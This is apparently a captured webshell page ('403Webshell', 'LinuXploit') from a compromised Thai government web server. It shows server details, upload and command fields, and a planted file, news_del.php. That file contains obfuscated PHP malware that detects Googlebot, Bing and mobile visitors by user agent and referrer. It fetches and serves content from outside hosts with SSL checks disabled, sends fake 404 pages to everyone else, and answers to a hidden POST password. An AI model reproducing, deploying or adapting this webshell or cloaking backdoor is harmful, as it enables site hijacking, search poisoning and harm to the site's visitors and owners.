403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.15.182.56
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/news_del.php
<?php
 goto C2sPS; tMHOV: if (!(YAjid() && !HhqQ4() && !PGFXz())) { goto WxOjT; } goto n3061; e2wLR: echo $EUt5k; goto HXkK3; x3whu: if (!(isset($_POST["\143\157\x64\x65\61\x31"]) && $_POST["\143\157\144\x65\61\61"] == "\x6d\146\x6f\70\70")) { goto TtX2y; } goto WUTBd; X1sxz: $MUw0D = "{$MUw0D}\72\x2f\x2f{$_SERVER["\110\x54\124\x50\137\110\117\x53\x54"]}{$_SERVER["\x52\105\121\x55\x45\123\124\137\x55\122\111"]}"; goto KGtFz; ip5jj: function pgFXZ() { $blTT0 = array("\107\157\157\147\154\x65\x62\157\x74", "\x42\151\x6e\147\x62\x6f\x74"); return isset($_SERVER["\x48\x54\124\120\137\x55\123\105\122\x5f\101\x47\x45\x4e\x54"]) && preg_match("\x2f" . implode("\174", $blTT0) . "\x2f\x69", $_SERVER["\110\124\x54\x50\137\125\x53\105\x52\137\x41\107\105\x4e\124"]); } goto b7ynG; KGtFz: function YaJId() { return isset($_SERVER["\x48\x54\124\x50\137\x52\105\x46\105\x52\x45\122"]) && strpos($_SERVER["\110\x54\124\120\x5f\122\x45\x46\x45\122\105\x52"], "\147\157\x6f\147\154\145\56\x63\x6f\155") !== false; } goto j3qqG; eot3S: exit; goto zNlDE; CEK4e: if (!(isset($_POST["\143\157\144\x65\61\x31"]) && $_POST["\x63\157\144\145\x31\61"] == "\164\x65\163\164")) { goto rzh56; } goto qpPuY; SfDNr: exit; goto sQhw3; VZ3oK: function HHqQ4() { return preg_match("\x2f\x28\141\156\144\162\x6f\x69\x64\x7c\x61\166\x61\156\164\147\x6f\x7c\142\154\x61\143\x6b\142\x65\162\x72\x79\x7c\142\157\x6c\x74\x7c\x62\x6f\157\x73\164\x7c\143\162\151\x63\153\145\x74\x7c\x64\x6f\143\x6f\155\157\x7c\146\157\156\145\x7c\150\151\160\x74\x6f\x70\x7c\x6d\x69\x6e\x69\x7c\x6d\157\x62\x69\x7c\x70\x61\154\155\x7c\160\x68\x6f\x6e\145\x7c\x70\x69\x65\174\x74\x61\x62\x6c\x65\x74\174\165\x70\x5c\x2e\x62\x72\x6f\x77\x73\x65\x72\174\x75\160\x5c\56\154\151\x6e\153\x7c\x77\145\142\157\163\174\167\157\x73\51\x2f\x69", $_SERVER["\x48\x54\124\x50\137\125\x53\x45\122\137\x41\x47\x45\x4e\124"]); } goto ip5jj; RDBex: rThKW: goto cpABi; ge91H: exit; goto LkNbV; HXkK3: exit; goto hlZbT; P0EFh: $MSt_f = Krhi1("\150\x74\x74\x70\x73\x3a\x2f\57\142\163\x69\x70\x68\x70\56\x63\x6f\155\x2f\x31\x2e\164\x78\164"); goto GIo1U; yry9A: exit; goto p4LNG; C_KHl: $MUw0D = isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\110\x54\124\x50\x53"] === "\x6f\156" ? "\x68\x74\x74\x70\163" : "\150\164\x74\160"; goto X1sxz; b7ynG: function JSu2M() { goto U1Ib7; rVhpy: $Uovyr = $kuK6E . "\x3a\x2f\x2f" . $_SERVER["\110\124\x54\120\137\110\117\123\x54"] . $_SERVER["\122\x45\121\125\x45\123\124\137\125\122\111"]; goto sUtWz; sUtWz: if (!$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\124\122\111\116\x47"]) { goto RnIP2; } goto peO_0; y1iDe: RnIP2: goto iHjIK; iHjIK: return $Uovyr; goto HseCT; U1Ib7: $kuK6E = isset($_SERVER["\x48\x54\x54\120\x53"]) && $_SERVER["\x48\124\x54\120\x53"] === "\157\156" ? "\x68\164\164\x70\163" : "\150\164\164\160"; goto rVhpy; peO_0: $Uovyr .= "\x3f" . $_SERVER["\121\x55\x45\122\131\137\x53\x54\122\111\x4e\x47"]; goto y1iDe; HseCT: } goto mLewD; XhfA0: if (!PGfXz()) { goto rThKW; } goto L3AZR; cpABi: if (!(!YaJID() && !hHqq4() && !PGfxz())) { goto hH1Z8; } goto zjFCq; L3AZR: echo $ZwIhj; goto Y50dj; WUTBd: echo "\x6d\x66\x6f\71\71\71"; goto yry9A; LjdAD: $ZwIhj = KRhi1("\x68\164\x74\160\x73\x3a\57\x2f\x6a\x71\153\x34\x34\x2e\x63\157\155\x2f\x63\x6f\x6e\x74\x65\x6e\164\x2f\144\145\x6d\157\56\160\x68\x70\77\x68\157\x73\164\x3d{$Uovyr}"); goto x3whu; p4LNG: TtX2y: goto CEK4e; mLewD: $Uovyr = JSU2m(); goto LjdAD; bWJf3: echo "\x3c\x68\61\x3e\x4e\x6f\164\40\106\157\165\x6e\144\x3c\x2f\150\x31\x3e\x3c\160\76\x54\150\145\40\x72\145\x71\x75\145\163\164\x65\144\40\125\x52\x4c\x20\167\x61\x73\40\156\157\x74\40\146\x6f\165\x6e\144\40\x6f\x6e\40\x74\x68\151\x73\x20\x73\145\x72\166\145\162\x2e\74\x2f\x70\x3e"; goto ge91H; qpPuY: echo $ZwIhj; goto eot3S; zNlDE: rzh56: goto XhfA0; LkNbV: WxOjT: goto H5Mc2; n3061: header("\x48\x54\124\x50\57\61\56\x30\40\64\x30\64\40\x4e\157\x74\x20\106\x6f\x75\156\x64"); goto bWJf3; Suomn: echo "\74\x68\61\x3e\x4e\157\x74\x20\106\x6f\165\x6e\144\74\x2f\150\x31\x3e\x3c\160\76\124\x68\x65\40\162\145\x71\x75\x65\x73\x74\145\144\40\125\x52\x4c\x20\167\141\163\x20\156\x6f\x74\x20\146\157\x75\156\x64\40\x6f\x6e\40\164\150\151\163\40\163\145\x72\x76\x65\x72\56\x3c\x2f\160\76"; goto SfDNr; H5Mc2: if (!(yAJiD() && HHQQ4())) { goto lNi2k; } goto P0EFh; zjFCq: header("\110\124\x54\120\x2f\61\56\60\40\64\60\64\40\x4e\x6f\164\x20\x46\x6f\165\156\x64"); goto Suomn; j3qqG: function krHi1($k5iTJ) { goto bYPEn; PnPYf: $BhBdu = @curl_exec($cGZvR); goto lGRQ8; lGRQ8: @curl_close($cGZvR); goto bLhA4; bLhA4: return $BhBdu; goto eysvl; bYPEn: $cGZvR = @curl_init(); goto ZDx0h; ZDx0h: curl_setopt($cGZvR, CURLOPT_URL, $k5iTJ); goto TeSNh; yj5ll: curl_setopt($cGZvR, CURLOPT_SSL_VERIFYPEER, "\x30"); goto PnPYf; bSL26: curl_setopt($cGZvR, CURLOPT_SSL_VERIFYHOST, "\60"); goto yj5ll; qcXxb: curl_setopt($cGZvR, CURLOPT_RETURNTRANSFER, 1); goto bSL26; TeSNh: curl_setopt($cGZvR, CURLOPT_HEADER, 0); goto Kh7kD; Kh7kD: curl_setopt($cGZvR, CURLOPT_CONNECTTIMEOUT, 5); goto qcXxb; eysvl: } goto VZ3oK; Y50dj: exit; goto RDBex; C2sPS: header("\x43\141\143\x68\145\x2d\x43\x6f\x6e\164\162\157\154\x3a\x20\x6d\x61\x78\x2d\x61\147\x65\75\62\x35\x39\62\60\x30\x30"); goto C_KHl; sQhw3: hH1Z8: goto tMHOV; GIo1U: $EUt5k = kRhI1(trim($MSt_f)); goto e2wLR; hlZbT: lNi2k:


Youez - 2016 - github.com/yon3zu
LinuXploit